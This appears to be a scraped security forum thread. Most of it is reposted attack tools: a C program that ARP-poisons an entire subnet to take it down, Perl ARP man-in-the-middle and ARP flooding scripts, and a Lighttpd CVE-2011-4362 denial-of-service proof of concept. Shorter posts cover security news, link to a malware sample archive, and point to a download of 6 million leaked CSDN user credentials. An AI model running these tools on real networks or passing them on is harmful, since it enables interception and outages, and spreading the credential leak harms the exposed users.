
         signal(SIGINT, fixMAC);

         sockfd = createRawSockFd(ETH_P_ALL);
         sockfd_fix = sockfd;

         /** GET NIC NAME, NIC IP, NIC MAC, GATEWAY IP, GATEWAY MAC, SUBNET MASK (NUMBER OF HOSTS ON SUBNET) **/
         if ((pipe = popen("cat /proc/net/route", "r")) == NULL) {
             fprintf(stderr, "pipe to cat route failed.\n");
             exit(-1);
         }

         while (fgets(pbuff, sizeof(pbuff), pipe) != NULL) {
             token = strtok(pbuff, "\t\n ");
             device_name = token;
             while (token != NULL) {
                 token = strtok(NULL, "\t\n ");
                 if (!strcmp(token, "00000000")) {
                     token = strtok(NULL, "\t\n ");
                     gateway_in_addr = strtol(token, NULL, 16);
                     break;
                 } else {
                     break;
                 }
                 token = strtok(NULL, "\t\n ");
             }
         }

         /* bind socket to this default network interface */
         bindSock(device_name, sockfd, ETH_P_ALL);

         /* get list of network address assigned NIC's */
         ifc.ifc_len = sizeof(buff);
         ifc.ifc_buf = buff;
         if (ioctl(sockfd, SIOCGIFCONF, &ifc) < 0) {
             perror("SIOCGIFCONF");
             exit(-1);
         }

         /* find NIC with default route, get NIC IP address */
         ifr = ifc.ifc_req;
         numIfs = ifc.ifc_len / sizeof(struct ifreq);
         for (i = 0; i < numIfs; i++) {
             ifr_item = &ifr[i];
             if (!strcmp(ifr_item->ifr_name, device_name))
                 device_in_addr = (((struct sockaddr_in *)&ifr_item->ifr_addr)->sin_addr).s_addr;
         }

         /* get NIC/GATEWAY MAC address */
         strncpy((char *)ifr_dat.ifr_name, device_name, IFNAMSIZ);
         if (ioctl(sockfd, SIOCGIFHWADDR, &ifr_dat) < 0) {
             perror("SIOCGIFHWADDR");
             exit(-1);
         }
         memcpy(orig_mac, ifr_dat.ifr_hwaddr.sa_data, 6);

         /* this is SO ugly but meh, it works */
         memset(&areq, 0, sizeof(areq));
         sin2 = (struct sockaddr_in *)&areq.arp_pa;
         sin2->sin_family = AF_INET;
         ipaddr.s_addr = gateway_in_addr;
         sin2->sin_addr = ipaddr;
         sin2 = (struct sockaddr_in *)&areq.arp_ha;
         sin2->sin_family = ARPHRD_ETHER;
         strncpy(areq.arp_dev, device_name, 15);
         if (ioctl(sockfd, SIOCGARP, (caddr_t)&areq) == -1) {
             perror("SIOCGARP: check your ARP table");
             exit(-1);
         }
         memcpy(gateway_mac, (&areq.arp_ha)->sa_data, 6);

         memcpy(&ifr_dat.ifr_hwaddr.sa_data,(unsigned char *)ether_aton(SPOOF_MAC),6);
         if (ioctl(sockfd, SIOCSIFHWADDR, &ifr_dat) < 0) {
             perror("SIOCSIFHWADDR");
             exit(-1);
         }
         memcpy(device_mac, ifr_dat.ifr_hwaddr.sa_data, 6);
         ifr_fix = ifr_dat;

         /* get subnet mask and network address to calculate number of hosts */
         if (ioctl(sockfd, SIOCGIFNETMASK, &ifr_dat) < 0) {
             perror("SIOCGIFNETMASK");
             exit(-1);
         }
         memcpy(&sin, &ifr_dat.ifr_addr, sizeof(struct sockaddr));
         netmask = sin.sin_addr.s_addr;
         subnet = (netmask & device_in_addr);
         for (i=0; i<32; i++)
             if (ntohl(netmask) & (1<<i))
                 break;
         zeros = i;
         numhosts = (1<<zeros);

         /* fill host_addrs with possible assigned addresses, skip 0x00?????? 0xFF?????? */
         remote_hosts = (unsigned int *)malloc(sizeof(unsigned int)*(numhosts));
         for (i = 0; i < numhosts; i++)
             remote_hosts[i] = (ntohl(subnet) | i);
         /** END NETWORK INFORMATION QUERIES **/

         /** CREATE DEFAULT ARP PACKET **/
         /* create memory segment for ARP packet header */
         ArpPacketSize = sizeof(EthernetHeader) + sizeof(ArpHeader);
         ArpPacket = (unsigned char *)malloc(ArpPacketSize);
         arp_ethernet_header = (EthernetHeader *)ArpPacket;
         arp_header = (ArpHeader *)(ArpPacket + sizeof(EthernetHeader));

         /* fill in ARP Request packet header */
         createArpHeader(arp_header, device_mac, (ether_aton(EMPTY))->ether_addr_octet, device_in_addr, 0, ARPOP_REQUEST);

         /* fill in ARP packet Ethernet header */
         createEthHeader(arp_ethernet_header, device_mac, (ether_aton(BROADCAST))->ether_addr_octet, ETHERTYPE_ARP);
         /** END DEFAULT PACKETS **/

         /** CREATE LIST OF HOSTS' IP -> MAC ADDRESSES VIA ARP REQUEST **/
         /* use two different processes to handle sending ARP Requests and receiving
            ARP Replies both for increased speed and reliability */
         setbuf(stdout, NULL);
         printf("\n");
         if ((pid = fork()) == 0) {
             /* send the ARP Requests out to all hosts in remote_hosts */
             for (i = 0; i < numhosts; i++) {
                 if (ntohl(remote_hosts[i]) == device_in_addr)
                     continue;
                 arp_header->dest_ip = htonl(remote_hosts[i]);
                 if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) {
                     perror(" [*] Packet send failed!\n");
                     exit(-1);
                 }
                 /* some networks create Ethernet collisions with dropped packets as a
                    result so slow it down a small amount */
                 usleep(100000);
             }
             sleep(10);
             exit(1);
         } else {
             /* listen for ARP Replies from the hosts on the network and record the MAC addresses */
             remote_host_info = malloc(sizeof(RemoteHost) * numhosts);
             signal(SIGCHLD, handler);
             childnotdead = 1;
             printf("Gathering MAC addresses...\n");
             printf("This may take a while so go get a drink or something.\n");
             i = 0;
             while (childnotdead) {
                 /* watch for ARP Replies */
                 FD_ZERO(&readfds);
                 FD_SET(sockfd, &readfds);
                 tv.tv_sec = 2;
                 memset(packet_recv, 0, sizeof(packet_recv));
                 if (select(sockfd+1, &readfds, NULL, NULL, &tv) < 0) {
                     perror("select()");
                 }
                 if (!childnotdead)
                     break;
                 if (FD_ISSET(sockfd, &readfds)) {
                     if ((bytes = read(sockfd, packet_recv, sizeof(packet_recv))) < 0) {
                         perror("read");
                     }
                     if (bytes > sizeof(EthernetHeader)) {
                         ethernet_header_reply = (EthernetHeader *)packet_recv;
                         if (ntohs(ethernet_header_reply->protocol) == ETHERTYPE_ARP) {
                             arp_header_reply = (ArpHeader *)(packet_recv + sizeof(EthernetHeader));
                             if (ntohs(arp_header_reply->opcode) == ARPOP_REPLY) {
                                 /* make sure source is not myself, the default route, or a duplicate entry */
                                 if (validTarget(arp_header_reply->source_ip, device_in_addr, gateway_in_addr, remote_host_info, i)) {
                                     memcpy(remote_host_info[i].mac, arp_header_reply->source_hardware, 6);
                                     remote_host_info[i].ip = arp_header_reply->source_ip;
                                     i++;
                                 }
                             }
                         }
                     }
                 }
             }
             hosts_online = i;
             printf("MAC addresses enumerated, %d machines attached to current subnet.\n", hosts_online);
             memcpy(answer, getAns("Display list of IP -> MAC? (y/n) "), sizeof(answer));
             if (!strcmp(answer, "yes") || !strcmp(answer, "y")) {
                 for (i = 0; i < hosts_online; i++)
                     printf("(%d) %s -> %s\n", i, uitos(ntohl(remote_host_info[i].ip)), mactos(remote_host_info[i].mac));
                 memset(answer, 0, sizeof(answer));
                 memcpy(answer, getAns("Would you like to remove any of these hosts from this list? (y/n) "), sizeof(answer));
                 if (!strcmp(answer, "yes") || !strcmp(answer, "y")) {
                     removeHosts(remote_host_info, hosts_online);
                 }
                 sleep(10);
             }
         }
         /** END MAC ADDRESS **/

         printf("\n");

         /** SEND SPOOFED ARP REPLY TO EACH HOST ONLINE **/
         for (;;) { //for()ever!!
             for (i = 0; i < hosts_online; i++) {
                 printf("Poisoning %s...\n", uitos(ntohl(remote_host_info[i].ip)));
                 sleep(1);
                 createArpHeader(arp_header, device_mac, remote_host_info[i].mac, gateway_in_addr, remote_host_info[i].ip, ARPOP_REPLY);
                 createEthHeader(arp_ethernet_header, gateway_mac, remote_host_info[i].mac, ETHERTYPE_ARP);
                 //printPacket(ArpPacket, ArpPacketSize);
                 if (!sendPacket(sockfd, ArpPacket, ArpPacketSize)) {
                     perror(" [*] Packet send failed!\n");
                     exit(-1);
                 }
             }
             printf("Subnet should be down. Repoisoning in 30s ...\n\n");
             sleep(30);
             printf("Repoisoning!\n");
             sleep(2);
         }
         /** END REPLIES **/

         free(ArpPacket);
         close(sockfd);
         return 0;
     }

     Source: r00tsecurity -> Source Code Center :: ARP Cache Poisoning
  13. Monkey || ARP Poisoning tool # monkey.pl # # ARP POISONING FrameWork # Copyright 2011 madstein <madstein@f0r3ns1cs> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. # # use Net::ARP ; use Term::ANSIColor; print q{ -------------------------- MADSTEIN ARP-OPT -------------------------- 1- MITM 2- REPING VICTIM }; print "\n"; print ">Choose OPERANDI:\n"; print color("green"),"\n>>>\n",color("reset"); $menu = <STDIN>; chomp $menu; if($menu == "1") { print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if ($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow 
) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("red"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"Poison on the Way\n"; print color ("green"),"[+]",color ("reset"),"Monkey in the Middle off $gateway $gatemac |and| $target $targetmac\n"; while (1) { #Gateway operandi this is the, where we Tell the victim we are the gateway Net::ARP::send_packet($iface, $gateway, $target, $mymac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway that we are the victim Net::ARP::send_packet($iface, $target, $gateway, $mymac, $gatemac, 'reply'); #ence you see this output you will be poisoning || attack on the way print STDERR color ("green"),".", color ("reset"); sleep (2); } } } if ($menu =="2"){ print color ("green"), "[+]",color ("reset"), "ARP Repinger \n" ; print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert Gateway IP \n" ; $gateway = <STDIN> ; print color ("red"), "[+]",color ("reset"), "Insert Target IP \n" ; $target = <STDIN> ; chomp ($gateway,$target,$iface); #Lets Forward All the Junk shall we system "iptables -P FORWARD ACCEPT"; system "iptables --table nat -A POSTROUTING -o $iface -j MASQUERADE"; #Note some times Net::ARP fails to lookup the Target MAC #If you ever enconter that kind of problem just reload the script #or hardcode the Target MAC $gatemac = Net::ARP::arp_lookup($dev,$gateway); $targetmac = Net::ARP::arp_lookup($dev,$target); $mymac = Net::ARP::get_mac("$iface"); if 
($gatemac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Gateway MAC\n"; die } if ($targetmac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Target MAC\n"; die} if ($mymac =~ unknow ) { print color ("green"), "[+]",color ("reset"), "could not get Local MAC\n"; die } else { system "clear"; print color ("yellow"), q{ < wtf > ----- \ \ .:!!!!!:. .!!!!!:. .!!!!!!!!!! ~~~~!!!!!!. .!!!!!!!UWWW$$$ :$$NWX!!: .!!!!XUWW$$$$$$$$$P $$$$$##WX!: .<!!!!UW$$$$" $$$$$$$$# $$$$$ $$$UX :!!UW$$$$$$$$$ 4$$$$$* ^$$$B $$$$\ $$$$$$$$$$$$ d$$R" "*$bd$$$$ '*$$$$$$$$$$$o+#" """" """"""" PURE POISON }, color ("reset"); print color ("green"),"[+]",color ("reset"),"REPINGER VERSION\n"; for ($count = 7; $count >= 1; $count--) { #Gateway operandi this is, the where we Tell the victim where the gateway is Net::ARP::send_packet($iface, $gateway, $target, $gatemac, $targetmac, 'reply'); #Target operandi this is the, where we tell the gateway where the victim is Net::ARP::send_packet($iface, $target, $gateway, $targetmac, $gatemac, 'reply'); #ence you see this output you will be REPINGING the VIctim attack will stop print STDERR color ("green"),".", color ("reset"); sleep (2); } } print "REPINGED\n"; } Sursa: r00tsecurity -> Source Code Center :: Monkey || ARP Poisoning tool
  14. Network Destroyer ARP TCP Flooder [COLOR=#888] [/COLOR] #!/usr/bin/perl #ubuntu sudo apt-get install libnet-arp-perl #ubuntu sudo apt-get install libnet-rawip-perl #Madstein - arp tester use Net::RawIP; use Term::ANSIColor; use Net::ARP ; inicio: print color ("red"), "[+]",color ("reset"), "Interface to Use Ex: eth1 | wlan0 | eth0 \n" ; $iface = <STDIN>; print color ("red"), "[+]",color ("reset"), "Insert IP to Get Mac Addr \n" ; $target = <STDIN> ; chomp ( $target,$iface ) ; $getmac = Net::ARP::arp_lookup($dev,$target); my $count = 0; if ($getmac =~ unknow ) { print "Something went Wrong The Target Retrieved an unknow Mac addr\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } elsif ($getmac =~ "00:00:00:00:00:00" ) { print "00:00:00:00:00:00 retrived error\n"; print "Prees Any Key To Restart Program\n"; $restart = <STDIN>; goto inicio ; } else { print color ("red"), "[+]",color ("reset"), " $target mac is $getmac \n"; print color ("green"), "[+]",color ("reset"), " type.. yes ..to flood || .. no .. to restart Program \n"; $flood = <STDIN>; if ($flood =~ yes ){ while (1) { my $src = join ".", map int rand 255, 1 .. 4; my $spoofedmac = join ":", map int rand 99, 1 .. 6, ; Net::ARP::send_packet($iface, # Device $src, # Source IP $target, # Destination IP $spoofedmac, # Source MAC $getmac, # Destinaton MAC 'reply'); # ARP operation $count++; print "Packeth Sent Tru $iface to $target using $src as ip "; print "with this spoofed mac $spoofedmac amount $count"; } } elsif ($flood =~ "no") { system " clear"; goto inicio;} } [COLOR=#888] [/COLOR] Sursa: r00tsecurity -> Source Code Center :: Network Destroyer ARP TCP Flooder
  15. Lighttpd 1.4.30 / 1.5 Denial Of Service Authored by Adam Zabrocki Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit. /* * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang * * Here the vulnerable code (src/http_auth.c:67) * * --- CUT --- * static const short base64_reverse_table[256] = { * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF * }; * * static unsigned char * base64_decode(buffer *out, const char *in) { * ... * int ch, ...; * size_t i; * ... * * ch = in[i]; * ... * ch = base64_reverse_table[ch]; * ... * } * --- CUT --- * * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices. 
* This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata * section before the base64_reverse_table table cause this situation. * * I have added some extra debug in the lighttpd source code to see if this vulnerability is * executed correctly. Here is output for one of the example: * * --- CUT --- * ptr[0x9a92c48] size[0xc0] used[0x0] * 127(. | 0 | 0) * -128(t | 1 | 0) * -127(e | 2 | 1) * -126(' | 3 | 2) * -125(e | 4 | 3) * -124(u | 5 | 3) * -123(r | 6 | 4) * -122(' | 7 | 5) * -121(s | 8 | 6) * -120(c | 9 | 6) * -119(i | 10 | 7) * -118(n | 11 | 8) * -117(i | 12 | 9) * -116( | 13 | 9) * -115(a | 14 | 10) * -114(t | 15 | 11) * -113(. | 16 | 12) * -112(e | 17 | 12) * -111(u | 18 | 13) * -110(r | 19 | 14) * -109(' | 20 | 15) * -108(f | 21 | 15) * -107(i | 22 | 16) * -106(e | 23 | 17) * -105(: | 24 | 18) * -104(= | 25 | 18) * -103(o | 26 | 19) * -102(t | 27 | 20) * -101(o | 28 | 21) * -100( | 29 | 21) * -99(a | 30 | 22) * -98(g | 31 | 23) * -97(. | 32 | 24) * -96(d | 33 | 24) * -95(g | 34 | 25) * -94(s | 35 | 26) * -93(: | 36 | 27) * -92(u | 37 | 27) * -91(s | 38 | 28) * -90(p | 39 | 29) * -89(o | 40 | 30) * -88(t | 41 | 30) * -87(d | 42 | 31) * -86(b | 43 | 32) * -85(c | 44 | 33) * -84(e | 45 | 33) * -83(d | 46 | 34) * -82(( | 47 | 35) * -81(n | 48 | 36) * -80(y | 49 | 36) * -79(h | 50 | 37) * -78(d | 51 | 38) * -77(g | 52 | 39) * -76(s | 53 | 39) * -75( | 54 | 40) * -74(r | 55 | 41) * -73(p | 56 | 42) * -72(a | 57 | 42) * -71(n | 58 | 43) * -70(. | 59 | 44) * -69(. | 60 | 45) * -68(d | 61 | 45) * -67(g | 62 | 46) * -66(s | 63 | 47) * -65(: | 64 | 48) * -64(( | 65 | 48) * -63(d | 66 | 49) * -62(- | 67 | 50) * -61(e | 68 | 51) * -60(s | 69 | 51) * -59( | 70 | 52) * -58(i | 71 | 53) * -57(s | 72 | 54) * -56(n | 73 | 54) * -55( | 74 | 55) * -54(i | 75 | 56) * -53(l | 76 | 57) * -52(. | 77 | 57) * -51(. 
| 78 | 58) * -50(k | 79 | 59) * -49(0 | 80 | 60) * -48(% | 81 | 60) * -47(] | 82 | 61) * -46(p | 83 | 62) * -45(r | 84 | 63) * -44(0 | 85 | 63) * -43(% | 86 | 64) * -42(] | 87 | 65) * -41(s | 88 | 66) * -40(z | 89 | 66) * -39([ | 90 | 67) * -38(x | 91 | 68) * -37(x | 92 | 69) * -36( | 93 | 69) * -35(s | 94 | 70) * -34(d | 95 | 71) * -33(0 | 96 | 72) * -32(% | 97 | 72) * -31(] | 98 | 73) * -30(. | 99 | 74) * -29(. | 100 | 75) * -28(d | 101 | 75) * -27(c | 102 | 76) * -26(d | 103 | 77) * -25(i | 104 | 78) * -24(g | 105 | 78) * -23(b | 106 | 79) * -22(s | 107 | 80) * -21(6 | 108 | 81) * -20(- | 109 | 81) * -19(t | 110 | 82) * -18(i | 111 | 83) * -17(g | 112 | 84) * -16(f | 113 | 84) * -15(i | 114 | 85) * -14(e | 115 | 86) * -13(. | 116 | 87) * -12(. | 117 | 87) * -11(. | 118 | 88) * -10(. | 119 | 89) * -9(. | 120 | 90) * -8(. | 121 | 90) * -7(. | 122 | 91) * -6(. | 123 | 92) * -5(. | 124 | 93) * -4(. | 125 | 93) * -3(. | 126 | 94) * -2(. | 127 | 95) * -1(. | 128 | 96) * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0] * ptr[0x9a92c48] size[0xc0] used[0x60] * string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.] * --- CUT --- * * First column is the offset so vulnerability is executed like it should be * (negative offsets). Second column is byte which is read out-of-bound. * * * Maybe you can find vulnerable binary? 
* * * Best regards, * Adam 'pi3' Zabrocki * * * -- * http://pi3.com.pl * http://site.pi3.com.pl/exp/p_cve-2011-4362.c * http://blog.pi3.com.pl/?p=277 * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <getopt.h> #define PORT 80 #define SA struct sockaddr char header[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; char header_port[] = "GET /%s/ HTTP/1.1\r\n" "Host: %s:%d\r\n" "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: pl,en-us;q=0.7,en;q=0.3\r\n" "Accept-Encoding: gzip, deflate\r\n" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n" "Proxy-Connection: keep-alive\r\n" "Authorization: Basic "; int main(int argc, char *argv[]) { int i=PORT,opt=0,sockfd; char *remote_dir = NULL; char *r_hostname = NULL; struct sockaddr_in servaddr; struct hostent *h = NULL; char *buf; unsigned int len = 0x0; if (!argv[1]) usage(argv[0]); printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\t\t[+] Preparing arguments... 
"); while((opt = getopt(argc,argv,"h:d:p:?")) != -1) { switch(opt) { case 'h': r_hostname = strdup(optarg); if ( (h = gethostbyname(r_hostname))==NULL) { printf("Gethostbyname() field!\n"); exit(-1); } break; case 'p': i=atoi(optarg); break; case 'd': remote_dir = strdup(optarg); break; case '?': usage(argv[0]); break; default: usage(argv[0]); break; } } if (!remote_dir || !h) { usage(argv[0]); exit(-1); } servaddr.sin_family = AF_INET; servaddr.sin_port = htons(i); servaddr.sin_addr = *(struct in_addr*)h->h_addr; len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512; if ( (buf = (char *)malloc(len)) == NULL) { printf("malloc() \n"); exit(-1); } memset(buf,0x0,len); if (i != 80) snprintf(buf,len,header_port,remote_dir,r_hostname,i); else snprintf(buf,len,header,remote_dir,r_hostname); for (i=0;i<130;i++) buf[strlen(buf)] = 127+i; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; buf[strlen(buf)] = '\r'; buf[strlen(buf)] = '\n'; printf("OK\n\t\t[+] Creating socket... "); if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) { printf("Socket() error!\n"); exit(-1); } printf("OK\n\t\t[+] Connecting to [%s]... ",r_hostname); if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) { printf("Connect() error!\n"); exit(-1); } printf("OK\n\t\t[+] Sending dirty packet... "); // write(1,buf,strlen(buf)); write(sockfd,buf,strlen(buf)); printf("OK\n\n\t\t[+] Check the website!\n\n"); close(sockfd); } int usage(char *arg) { printf("\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\n"); printf("\n\tUsage: %s <options>\n\n\t\tOptions:\n",arg); printf("\t\t\t -v <victim>\n\t\t\t -p <port>\n\t\t\t -d <remote_dir_for_auth>\n\n"); exit(0); } Sursa: Lighttpd 1.4.30 / 1.5 Denial Of Service ? Packet Storm
  16. Lynis Auditing Tool 1.3.0 Authored by Michael Boelen | Site rootkit.nl Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. Changes: Some tests have been extended and a few new ones have been added to this release. There are also improvements for the screen output and logging. Download: http://packetstormsecurity.org/files/download/108164/lynis-1.3.0.tar.gz
  17. Pentagon approved Android to be used by DoD officials

The Pentagon has approved a version of Android running on Dell hardware to be used by DoD officials, along with the BlackBerry. The approval of Android by the DoD is a major setback for Apple's iPhone. The military approval is quite specific. Android can only be used on Dell's hardware running Android 2.2. Dell is now offering Dell Venue which runs on Android 2.2. So, this is the phone which DoD employees can use.

The Dell Mobile Security for Android platform has been certified by the Defense Information Systems Agency (DISA) for information assurance and use on defence networks. The Dell Android solution will help the military adapt to today’s operating environment with greater mobility and improved, real-time access to information on the ground.

Why the DoD chose Android? The reason was simple: open source. Stars & Stripes reports, “Android, developed by Google and other companies, is open source software meaning it can be easily configured by users – including DOD tech whizzes who want to install security measures.” Using Apple's iPhone or iOS by government officials is a risk, especially when used by non-American officials. Apple tracks your movement through the built-in GPS chips.

Other features include enhanced password protection such as the ability to lock the device down after multiple unsuccessful password entries. Administrators also can remotely control the peripherals and security policy levels on the device, he said. The government-issue Streak 5 also includes DISA-approved security provided by Good Technology’s Mobility Suite. Although the Streak 5 is no longer available commercially, Dell is supplying it to DOD because the military likes the form factor, Marinho said. However, he added that the same capabilities and service can be delivered to other platforms running on Android.

Source: Pentagon approved Android to be used by DoD officials | The Hacker News (THN)
  18. Nytro

    Malwares

    Safegroup malwares

    12.2011/ - 24.12.2011 11:12
    11.2011/ - 30.11.2011 07:16
    10.2011/ - 01.11.2011 06:30
    09.2011/ - 25.09.2011 12:53
    wiry do gier/ - 08.09.2011 05:05
    06.2011/ - 08.09.2011 12:36
    05.2011/ - 08.09.2011 12:27
    04.2011/ - 08.09.2011 12:16
    03.2011/ - 08.09.2011 12:06
    02.2011/ - 07.09.2011 11:58
    01.2011/ - 07.09.2011 11:54
    exploits/ - 07.09.2011 11:01
    ALL_MAL_URLS/ - 07.09.2011 11:00
    08.2011/ - 07.09.2011 10:59
    07.2011/ - 07.09.2011 10:53

    Link: http://malwares.pl/
  19. Nytro: Message to Anonymous - "Muie"
  20. Where is the challenge? This looks more like a computer science homework assignment.
  21. SecurityXploded Ebook Search

Example:

Showing 1 to 10 out of 2981 results

  • CCNA_security.pdf (Size: 33,214 KB, Download Count: 14,500)
  • Cisco Press - CCNA Security Packet Tracer Manual.pdf (Size: 1,438 KB, Download Count: 7,189)
  • Network.Security.Bible.Jan.2005.pdf (Size: 12,841 KB, Download Count: 7,171)
  • CCNA-SECURITY-640.553.pdf (Size: 33,214 KB, Download Count: 6,065)
  • Sybex CompTIA Security+ Studyguide 3rd Ed.pdf (Size: 10,876 KB, Download Count: 5,843)
  • CISSP - Certified Information Systems Security Professional Study Guide, Third Edition.pdf (Size: 14,566 KB, Download Count: 5,678)
  • Damodaran On Valuation Security Analysis for investment and corporate finance.PDF (Size: 29,802 KB, Download Count: 5,637)
  • CCNA Security Quick Reference.pdf (Size: 4,087 KB, Download Count: 5,064)
  • Cryptography and Network Security Forouzan.pdf (Size: 50,157 KB, Download Count: 4,301)
  • Network.Security.Technologies.Second.Edition.pdf (Size: 4,478 KB, Download Count: 3,608)

Link: http://securityxploded.com/search-ebooks.php
  22. China Software Developer Network (CSDN) 6 Million user data Leaked

Posted by THN Reporter On 12/21/2011 07:33:00 AM

The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 million CSDN users' info, including user names, passwords and emails, all in clear text, leaked on the internet. The download link (use xunlei to download the file) of the file is available on various social networks. Chinese programmers are now busy changing their passwords.

Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for Download Now : Here

Just did some data mining on the CSDN leaked user data. Some interesting findings. Here are the results of the Top 100 email providers from 6M CSDN user emails:

  • @qq.com, 1976190
  • @163.com, 1766919
  • @126.com, 807893
  • @sina.com, 351590
  • @yahoo.com.cn, 205487
  • @hotmail.com, 202944

Security is important, especially for online services. And NEVER store user passwords in clear text.

Source: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)
  23. Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers

